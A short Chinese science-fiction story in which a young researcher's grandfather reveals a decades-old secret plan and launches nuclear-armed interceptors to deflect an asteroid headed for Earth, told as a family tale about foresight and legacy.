自那天开始，我便把自己关在研究所里，整整半个月，对着电脑屏幕进行着大量的计算，不眠不休，但人就没有找到解决方法，无论任何方法，地球的毁灭似乎都是板上钉钉的事了。在我一筹莫展之时，我的爷爷和父亲突然给我打来了一个电话，我才发现，原来我已经半个月没有离开过我自己的实验室——他们是叫我回家吃饭的。
我崩溃了，在电话里哭的很伤心，因为无法拯救地球。他们让我先回家，拯救不了地球，也没时间逃离，那不如好好享受这最后的时光。
到了家，在饭桌上，我们三人相顾无言，只是在不停的吃着饭。爷爷与父亲看了看我，终于挑起了话头：“孩子 没什么好担心的，人固有一死，你已经尽力了。小行星撞地球已是必然，那你再怎么担心也没用了。好好享受吧。”他们知道，打小我就是个好强的人，各种事情都争个第一，事不办成坚决不罢休。
“其实，我们留了后手，”爷爷突然说出了这么一句话，“70年前，我们便预知了未来可能会发生这样的事情，实验室秘密启动了地球防卫储备计划，我便是这个计划的负责人。”爷爷喝了一口茶，又慢悠悠的说，“那个时代，我们每个人都在考虑着未来的事，为未来会发生的一切事情提前做好准备，自然也有小行星反击预案……”
爷爷说完，我和父亲都吃了一惊，当场开始了计算与模拟，发现这个方案拦截成功率竟然高达90%。人类发展了这么多年，技术爆炸，视野却越来越窄，不再计划未来。我们现在居然要用一个70多年前的技术，来拯救地球。。。。。。
距离小行星到达地球还有7天，爷爷带领我们来到了深山里的拦截基地。大门已经被雨水冲刷的生锈，但控制室仍旧一尘不染，宛如有人每天都在打理一样。
爷爷慢慢的走向操作台，熟练的操作起了发射流程，就像70多年前的预演一样，很快就完成了发射准备。
“确认系统状态，确认拦截窗口，确认发射模式，确认核弹状态”爷爷命令我前去做最后的确认，“确认，确认，确认，确认，可以发射”不知为何，我的心里突然紧张了起来，可能是对系统稳定的担心，可能是对成功率的担心，也可能，不过是我自己在缠着自己。
爷爷按下了发射键。地面嗡嗡的振动了起来，屏幕上显示全世界的80多个核弹发射井的非工质火箭同时发射，将拯救地球的核弹向着小行星以极快的速度发射而去。
当年的计划，是通过大当量核弹打击小行星，将其推离既定轨道，借住土星和木星的引力弹弓将其弹走。而这是我未曾想到的。
“走吧，回家等着。”爷爷头也不回的对我们说了这么一句话。
无言。
后来的事情你们也知道了。新闻报道，科学家近日发现一颗小行星，以极快的速度向地球冲来，并以极近的距离掠过，导致全球停电，通信中断数小时。
离开研究所，阳光照射着我的脸庞，就如一百年前的那天照射着爷爷的阳光一样，明亮且温暖。